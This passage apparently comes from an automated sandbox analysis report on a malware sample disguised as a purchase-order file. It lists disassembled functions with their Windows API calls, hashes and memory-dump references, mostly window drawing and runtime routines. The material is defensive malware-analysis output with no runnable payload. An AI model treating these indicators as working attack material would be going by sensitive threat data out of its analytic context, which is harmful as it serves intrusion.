                        • Opcode Fuzzy Hash: 5cd488e91dcfebe5a6ac77a56dbdd160e91b4aa5f7634c0dab7b2edbb712252f
                        • Instruction Fuzzy Hash: 94E04F766142049FC710EFA9D819E97F7ECAF98790F01842AFA45D7291DAB0F8148BA0
                        Function 002F7DD5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                        Download Yara Rule
                        APIs
                        • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002F7DF8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: mouse_event
                        • String ID:
                        • API String ID: 2434400541-0
                        • Opcode ID: 47664bcc59d3c87d2f6ddca2c0828c3b956280af512190ed30eeae4807fdd82f
                        • Instruction ID: e0e7be8931f171f8382f442b4bbae4c0ada521cb8138f8599f3ef2cafca1cbc5
                        • Opcode Fuzzy Hash: 47664bcc59d3c87d2f6ddca2c0828c3b956280af512190ed30eeae4807fdd82f
                        • Instruction Fuzzy Hash: 22D09EA517C60F79FD190B209C2FF7A9109EB457C1FE456A9B301C60C1EFD068645435
                        Function 002EBE95 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                        Download Yara Rule
                        APIs
                        • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002EBA6A), ref: 002EBEB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LogonUser
                        • String ID:
                        • API String ID: 1244722697-0
                        • Opcode ID: ce6c41a1ae43391c2fca72003fad4fd1e4656b9529ad7305ac19917ce95783ce
                        • Instruction ID: 24ff60a36bdb54e8761f7d9b4d1cccef4eac4811730a301acaa7868da770ed4d
                        • Opcode Fuzzy Hash: ce6c41a1ae43391c2fca72003fad4fd1e4656b9529ad7305ac19917ce95783ce
                        • Instruction Fuzzy Hash: E5D09E321A464EAEDF025FA4ED06EAE3F6AEB04B01F448511FA15D50A1C775D531AB50
                        Function 0032C146 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: NameUser
                        • String ID:
                        • API String ID: 2645101109-0
                        • Opcode ID: e2c14c62675936d3f41bb9947bec909395ad448adbe51800ac8d355ca8970d60
                        • Instruction ID: f3fd9ae5e6a899317cbb902bc03670b5e5ded6b391d5b9a26f2517e72f0996fd
                        • Opcode Fuzzy Hash: e2c14c62675936d3f41bb9947bec909395ad448adbe51800ac8d355ca8970d60
                        • Instruction Fuzzy Hash: 5CC04CB140401DDFC716CB80D9859EFF7BCBB04300F104095A115E1000D7709B459B71
                        Function 002D8E19 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(?), ref: 002D8E1F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: b182178899ba5af1ca446c0d18781840b0103311fb7d8b78e38b2bb20f973dd9
                        • Instruction ID: 6a7d788daba9d4f22214617e35c3aae103677b2365d143e242ff4b112ac7f882
                        • Opcode Fuzzy Hash: b182178899ba5af1ca446c0d18781840b0103311fb7d8b78e38b2bb20f973dd9
                        • Instruction Fuzzy Hash: 0CA0123000050CA78A011B51FC044447F5CD604260F004010F40C01021873358104981
                        Function 002DA937 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(002D6AE9,003667D8,00000014), ref: 002DA937
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 7263d8b2391bc10d032a5b19226055df08d999ad4c8808011d8cc46a85639d89
                        • Instruction ID: a57e7653fcb218fc33ea9b59a7fdb5da5a0ba4ede4f4fcb5de8e5ddf5c4e853b
                        • Opcode Fuzzy Hash: 7263d8b2391bc10d032a5b19226055df08d999ad4c8808011d8cc46a85639d89
                        • Instruction Fuzzy Hash: 3FB012B07031028BD74D4B38BC9411A79DC574E301B01403D7407C2570DB308450DF00
                        Function 002D0EC4 Relevance: .3, Instructions: 345COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                        • Instruction ID: f3eec7e420af7b7b56b029dfd33046a2dafc2c7313a34e8abb9579f6bc2fba80
                        • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                        • Instruction Fuzzy Hash: 57C106722251A349DF2D4A39C47453EFAA15EA17B131A075FD8B3CBAD0EE24CD34D650
                        Function 002D12F9 Relevance: .3, Instructions: 341COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                        • Instruction ID: fc6a0a5c8ddabf4fbd99dc5fb902fbde8d3e03a39e78116458d8dd876f5e15da
                        • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                        • Instruction Fuzzy Hash: 96C106722251934ADF2D4A39C47053EFAA15EA27B131A036FD4B3CBAD4EE24CD34D660
                        Function 002D0A8F Relevance: .3, Instructions: 331COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction ID: 0cae4bbdcba5392c67a86bd45a4406ba34b3a1d5b5a32e5c1c82eb12259f073d
                        • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                        • Instruction Fuzzy Hash: BDC1197222919349DF2D4A39C4B063EFBA15AA17B571A076FD4B3CB2E0EE14CD34D650
                        Function 002D0677 Relevance: .3, Instructions: 323COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction ID: 07ccd109480b0c4b06d5f3bfd84b6378d1ff478d9164e10a3142e44c7117e2fd
                        • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                        • Instruction Fuzzy Hash: B4C1057222519349EF1D4A3984B463EFBA05EA17B171A035FD4B3CB2E1EE24CD34D660
                        Function 03BC3600 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction ID: 57a2d17d6f81a8fc59a34ca82b30e1310663c07e98093b47e06e19d1ffd256c5
                        • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                        • Instruction Fuzzy Hash: FF41C471D1051CDBCF48CFADC991AAEBBF1AF88201F548299D516AB345D734AB41DB40
                        Function 03BC3490 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction ID: dc09e0c02986b3dc2d2b0f81ec0558c1f1b0439718f7cdee71d17c1c3c10033b
                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                        • Instruction Fuzzy Hash: D501C078A10208EFCB54DF98C5809AEF7F5FB88214F6485E9D809A7300D734AE41DB80
                        Function 03BC34F0 Relevance: .0, Instructions: 35COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction ID: 8ed6a3062fc6ab27908634b5eb5d195e34e9517ac78e7bf76e69c9bf312ee3b9
                        • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                        • Instruction Fuzzy Hash: 8501D278A10208EFCB55DF98C5909AEF7F5FB48310F6485E9D809A7301D734AE41CB80
                        Function 03BC1E70 Relevance: .0, Instructions: 6COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                        Function 0030A750 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 490filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • DeleteObject.GDI32(00000000), ref: 0030A7A5
                        • DeleteObject.GDI32(00000000), ref: 0030A7B7
                        • DestroyWindow.USER32 ref: 0030A7C5
                        • GetDesktopWindow.USER32 ref: 0030A7DF
                        • GetWindowRect.USER32(00000000), ref: 0030A7E6
                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0030A927
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0030A937
                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A97F
                        • GetClientRect.USER32(00000000,?), ref: 0030A98B
                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0030A9C5
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A9E7
                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030A9FA
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA05
                        • GlobalLock.KERNEL32(00000000), ref: 0030AA0E
                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA1D
                        • GlobalUnlock.KERNEL32(00000000), ref: 0030AA26
                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA2D
                        • GlobalFree.KERNEL32(00000000), ref: 0030AA38
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AA4A
                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0033D9BC,00000000), ref: 0030AA60
                        • GlobalFree.KERNEL32(00000000), ref: 0030AA70
                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0030AA96
                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0030AAB5
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030AAD7
                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0030ACC4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                        • String ID: $AutoIt v3$DISPLAY$static
                        • API String ID: 2211948467-2373415609
                        • Opcode ID: 210a80c42174a4fb3064bcd91b43ca7b7c8d6cff7cf4b79634d0ca3c158aaccb
                        • Instruction ID: 5dd052f7cc01d13c7650fcd45820595dc18eeba5f1a1ba2477462d01b6863ce9
                        • Opcode Fuzzy Hash: 210a80c42174a4fb3064bcd91b43ca7b7c8d6cff7cf4b79634d0ca3c158aaccb
                        • Instruction Fuzzy Hash: 44027D71910205EFDB15DFA8EC99EAE7BB9FB48310F108119F915AB2A0D7309D41CB60
                        Function 0031D095 Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                        Download Yara Rule
                        APIs
                        • SetTextColor.GDI32(?,00000000), ref: 0031D0EB
                        • GetSysColorBrush.USER32(0000000F), ref: 0031D11C
                        • GetSysColor.USER32(0000000F), ref: 0031D128
                        • SetBkColor.GDI32(?,000000FF), ref: 0031D142
                        • SelectObject.GDI32(?,00000000), ref: 0031D151
                        • InflateRect.USER32(?,000000FF,000000FF), ref: 0031D17C
                        • GetSysColor.USER32(00000010), ref: 0031D184
                        • CreateSolidBrush.GDI32(00000000), ref: 0031D18B
                        • FrameRect.USER32(?,?,00000000), ref: 0031D19A
                        • DeleteObject.GDI32(00000000), ref: 0031D1A1
                        • InflateRect.USER32(?,000000FE,000000FE), ref: 0031D1EC
                        • FillRect.USER32(?,?,00000000), ref: 0031D21E
                        • GetWindowLongW.USER32(?,000000F0), ref: 0031D249
                          • Part of subcall function 0031D385: GetSysColor.USER32(00000012), ref: 0031D3BE
                          • Part of subcall function 0031D385: SetTextColor.GDI32(?,?), ref: 0031D3C2
                          • Part of subcall function 0031D385: GetSysColorBrush.USER32(0000000F), ref: 0031D3D8
                          • Part of subcall function 0031D385: GetSysColor.USER32(0000000F), ref: 0031D3E3
                          • Part of subcall function 0031D385: GetSysColor.USER32(00000011), ref: 0031D400
                          • Part of subcall function 0031D385: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0031D40E
                          • Part of subcall function 0031D385: SelectObject.GDI32(?,00000000), ref: 0031D41F
                          • Part of subcall function 0031D385: SetBkColor.GDI32(?,00000000), ref: 0031D428
                          • Part of subcall function 0031D385: SelectObject.GDI32(?,?), ref: 0031D435
                          • Part of subcall function 0031D385: InflateRect.USER32(?,000000FF,000000FF), ref: 0031D454
                          • Part of subcall function 0031D385: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0031D46B
                          • Part of subcall function 0031D385: GetWindowLongW.USER32(00000000,000000F0), ref: 0031D480
                          • Part of subcall function 0031D385: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0031D4A8
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                        • String ID:
                        • API String ID: 3521893082-0
                        • Opcode ID: fcf4200d03b04ae28aa5ca502428e418708568c6d8a348540430d7e2ae6a46f5
                        • Instruction ID: 589c508352e60ba605500177526238724894f10f0d1f6482133be0d329f60c8e
                        • Opcode Fuzzy Hash: fcf4200d03b04ae28aa5ca502428e418708568c6d8a348540430d7e2ae6a46f5
                        • Instruction Fuzzy Hash: 81919072408301BFDB129F64EC88E9B7BADFF8A321F100A19F962961E0D775D985CB51
                        Function 002B48C8 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32 ref: 002B4956
                        • DeleteObject.GDI32(00000000), ref: 002B4998
                        • DeleteObject.GDI32(00000000), ref: 002B49A3
                        • DestroyIcon.USER32(00000000), ref: 002B49AE
                        • DestroyWindow.USER32(00000000), ref: 002B49B9
                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 0032E179
                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0032E1B2
                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0032E5E0
                          • Part of subcall function 002B49CA: InvalidateRect.USER32(?,00000000,00000001,?,?,?,002B4954,00000000), ref: 002B4A23
                        • SendMessageW.USER32 ref: 0032E627
                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0032E63E
                        • ImageList_Destroy.COMCTL32(00000000), ref: 0032E654
                        • ImageList_Destroy.COMCTL32(00000000), ref: 0032E65F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                        • String ID: 0
                        • API String ID: 464785882-4108050209
                        • Opcode ID: a0f132420979ec35f304c83e4f595767f5ddb4d132f3c52cf46f1430e15ea9cc
                        • Instruction ID: 8ab98efb3e97e17ad07663f7619037bbb3efa44e60b41c11b2c449718705009d
                        • Opcode Fuzzy Hash: a0f132420979ec35f304c83e4f595767f5ddb4d132f3c52cf46f1430e15ea9cc
                        • Instruction Fuzzy Hash: AB12D130210622DFDB22EF14E8C6BAABBE4BF05305F154569F59ACB252C731EC55CB91
                        Function 0030A3F7 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(00000000), ref: 0030A42A
                        • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0030A4E9
                        • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 0030A527
                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 0030A539
                        • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 0030A57F
                        • GetClientRect.USER32(00000000,?), ref: 0030A58B
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 0030A5CF
                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 0030A5DE
                        • GetStockObject.GDI32(00000011), ref: 0030A5EE
                        • SelectObject.GDI32(00000000,00000000), ref: 0030A5F2
                        • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 0030A602
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0030A60B
                        • DeleteDC.GDI32(00000000), ref: 0030A614
                        • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0030A642
                        • SendMessageW.USER32(00000030,00000000,00000001), ref: 0030A659
                        • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 0030A694
                        • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0030A6A8
                        • SendMessageW.USER32(00000404,00000001,00000000), ref: 0030A6B9
                        • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0030A6E9
                        • GetStockObject.GDI32(00000011), ref: 0030A6F4
